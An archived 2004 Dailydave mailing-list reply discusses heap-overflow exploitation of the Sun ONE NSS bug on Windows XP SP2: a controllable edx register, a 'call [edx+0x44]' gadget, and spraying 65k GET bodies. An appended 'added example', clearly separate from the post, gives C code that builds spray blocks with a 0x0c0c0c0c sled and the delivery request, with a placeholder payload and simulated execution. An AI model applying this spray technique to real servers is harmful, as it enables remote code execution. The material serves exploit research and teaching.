Dailydave mailing list archives

Re: quick notes


From: H D Moore <hdm-daily-dave () digitaloffense net>
Date: Fri, 27 Aug 2004 13:40:08 -0500

On Friday 27 August 2004 13:27, Dave Aitel wrote:
> In addition to having the NSS heap overflow working against Windows XP
> SP2 (just to say that it can be done, not that people are running
> SunONE on Windows), 
Working on XP SP2 here as well. Using a request of 1024 bytes (256 * ret) 
I was able to hit a "call [edx+0x44]" where edx is controllable. This is 
actually preferable to write-what-where, especially when the target has 
heap cookies. The nice thing about SunONE is that the server will restart 
itself for you...So if you don't get it the first time, try, try again.

The tricky part of this exploit is determining a static address to use for 
the value of edx. This register needs to point to a pointer of your 
shellcode. It is possible to load arbitrary amounts of data into the heap 
of the remote process through GET requests with a Content-Length set. 
Using a handful of connections, each sending about 65k, I was able to 
reliably place and return to shellcode. If your return address doubles as a 
nop-like instruction, it makes things much easier, since you can simply 
append your shellcode to the end of each 65k data block and let execution 
slide right through. Of course, this depends on being able to get data 
into an address which will become a valid nop-like instruction no matter 
what offset into it is hit. Anywho, Metasploit module will be available 
sometime in the next week or two, moving sucks :/

Dave, are you using this vector to gain eip, or have you found another way 
that is easier/more reliable? The fact that SSLv2 ciphers are not enabled 
by default drops the value of this bug quite a bit.

-HD
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://www.immunitysec.com/mailman/listinfo/dailydave
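The layout HD describes above (a controllable edx, a "call [edx+0x44]" gadget, 65k heap blocks delivered as GET bodies with a Content-Length, and a sled whose 4-byte value is both the address the exploit needs and a harmless instruction at any byte offset) can be modelled offline. The following is an added example written for this archive page; it is not code from the post, from Dave or HD, or from the Metasploit module. It assumes the sled value 0x0c0c0c0c (the classic x86 choice, which decodes as "or al, 0x0c" at any offset; the post does not name a value), an assumed spray base address 0x0c0c0000, a constructed three-byte placeholder payload, and a simplified HTTP/1.0 request format. The 0x44 displacement and the ~65k block size are taken from the post. The execution model only steps through the sled as 2-byte "opcode imm8" instructions; it is not an emulator.

```c
/*
 * Added example, not from the mailing-list post. Models a heap spray where
 * every block is a run of one 4-byte value (sled) followed by the payload,
 * then checks that "call [edx+0x44]" with edx pointing into the spray loads
 * that same value, lands in the sled, and slides into the payload.
 * Assumptions: sled value 0x0c0c0c0c, spray base 0x0c0c0000, constructed
 * placeholder payload, HTTP/1.0 request shape. 0x44 and ~65k are from the post.
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK_LEN    65536u        /* "about 65k" per block, as in the post */
#define DISPATCH_OFF 0x44u         /* the post's gadget: call [edx+0x44]   */
#define SLED_VALUE   0x0c0c0c0cu   /* assumption: x86 "or al, 0x0c" sled   */

/* Constructed placeholder payload: a leading nop (0x90) absorbs the byte a
 * straddling sled instruction may consume as its immediate, then two int3. */
static const uint8_t PAYLOAD[] = { 0x90, 0xcc, 0xcc };

/* A sled value is offset-invariant when all four bytes are equal: whatever
 * byte boundary execution lands on, the same instruction stream is decoded. */
int sled_is_offset_invariant(uint32_t v) {
    uint8_t b = (uint8_t)v;
    return ((v >> 8) & 0xffu) == b && ((v >> 16) & 0xffu) == b && (v >> 24) == b;
}

/* Fill block_len bytes with little-endian sled, then put the payload at the
 * tail so execution sliding forward through the sled reaches it. Returns the
 * offset at which the payload begins. */
size_t build_spray_block(uint8_t *block, size_t block_len, uint32_t sled,
                         const uint8_t *payload, size_t payload_len) {
    size_t i;
    for (i = 0; i < block_len; i++)
        block[i] = (uint8_t)(sled >> (8 * (i % 4)));
    size_t start = block_len - payload_len;
    memcpy(block + start, payload, payload_len);
    return start;
}

/* Delivery as in the post: a GET whose Content-Length makes the server buffer
 * the body on its heap. Returns bytes written, or 0 if out is too small. */
size_t build_spray_request(uint8_t *out, size_t out_len,
                           const uint8_t *block, size_t block_len) {
    int n = snprintf((char *)out, out_len,
                     "GET / HTTP/1.0\r\nContent-Length: %zu\r\n\r\n", block_len);
    if (n < 0 || (size_t)n + block_len > out_len) return 0;
    memcpy(out + n, block, block_len);
    return (size_t)n + block_len;
}

/* Model "call [edx+0x44]": the 4-byte pointer the CPU loads, given the block
 * is mapped at base. Returns 0 when the load falls outside the block. */
uint32_t model_dispatch(const uint8_t *block, size_t block_len,
                        uint32_t base, uint32_t edx) {
    uint64_t ea = (uint64_t)edx + DISPATCH_OFF;
    if (ea < base || ea - base + 4 > block_len) return 0;
    size_t off = (size_t)(ea - base);
    return (uint32_t)block[off] | (uint32_t)block[off + 1] << 8 |
           (uint32_t)block[off + 2] << 16 | (uint32_t)block[off + 3] << 24;
}

/* Model execution from eip through the sled. Assumes the sled byte is the
 * opcode of a 2-byte "opcode imm8" instruction (true for 0x0c: or al, imm8),
 * so each step consumes two bytes. Returns the offset of the first byte not
 * decoded as part of the sled, or (size_t)-1 if eip is outside the block. */
size_t model_slide(const uint8_t *block, size_t block_len,
                   uint32_t base, uint32_t eip, uint32_t sled) {
    if (eip < base || (uint64_t)eip - base >= block_len) return (size_t)-1;
    size_t pc = (size_t)(eip - base);
    while (pc < block_len && block[pc] == (uint8_t)sled) pc += 2;
    return pc < block_len ? pc : (size_t)-1;
}

/* End to end: spray, dispatch through [edx+0x44], slide, and report the
 * offset where execution leaves the sled. (size_t)-1 if the chain breaks. */
size_t demo_landing_offset(uint32_t base, uint32_t edx) {
    uint8_t *block = malloc(BLOCK_LEN);
    if (!block) return (size_t)-1;
    build_spray_block(block, BLOCK_LEN, SLED_VALUE, PAYLOAD, sizeof PAYLOAD);
    uint32_t target = model_dispatch(block, BLOCK_LEN, base, edx);
    size_t landing = target ? model_slide(block, BLOCK_LEN, base, target, SLED_VALUE)
                            : (size_t)-1;
    free(block);
    return landing;
}

int main(void) {
    uint8_t *block = malloc(BLOCK_LEN), *req = malloc(BLOCK_LEN + 128);
    if (!block || !req) return 1;
    size_t start = build_spray_block(block, BLOCK_LEN, SLED_VALUE, PAYLOAD, sizeof PAYLOAD);
    size_t req_len = build_spray_request(req, BLOCK_LEN + 128, block, BLOCK_LEN);
    printf("sled invariant: %d, payload at %zu, request %zu bytes\n",
           sled_is_offset_invariant(SLED_VALUE), start, req_len);
    /* even and odd landing parity relative to the payload boundary */
    printf("landing (base 0x0c0c0000): %zu\n", demo_landing_offset(0x0c0c0000u, SLED_VALUE));
    printf("landing (base 0x0c0c0001): %zu\n", demo_landing_offset(0x0c0c0001u, SLED_VALUE));
    free(block); free(req);
    return 0;
}
```

The two base addresses in main show the parity caveat: with the 2-byte sled instruction, execution may reach the boundary one byte late and consume the first payload byte as an immediate, which is why the constructed payload starts with a nop. Whichever parity applies, the model leaves the sled at or after the payload start and never inside the int3 bytes.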

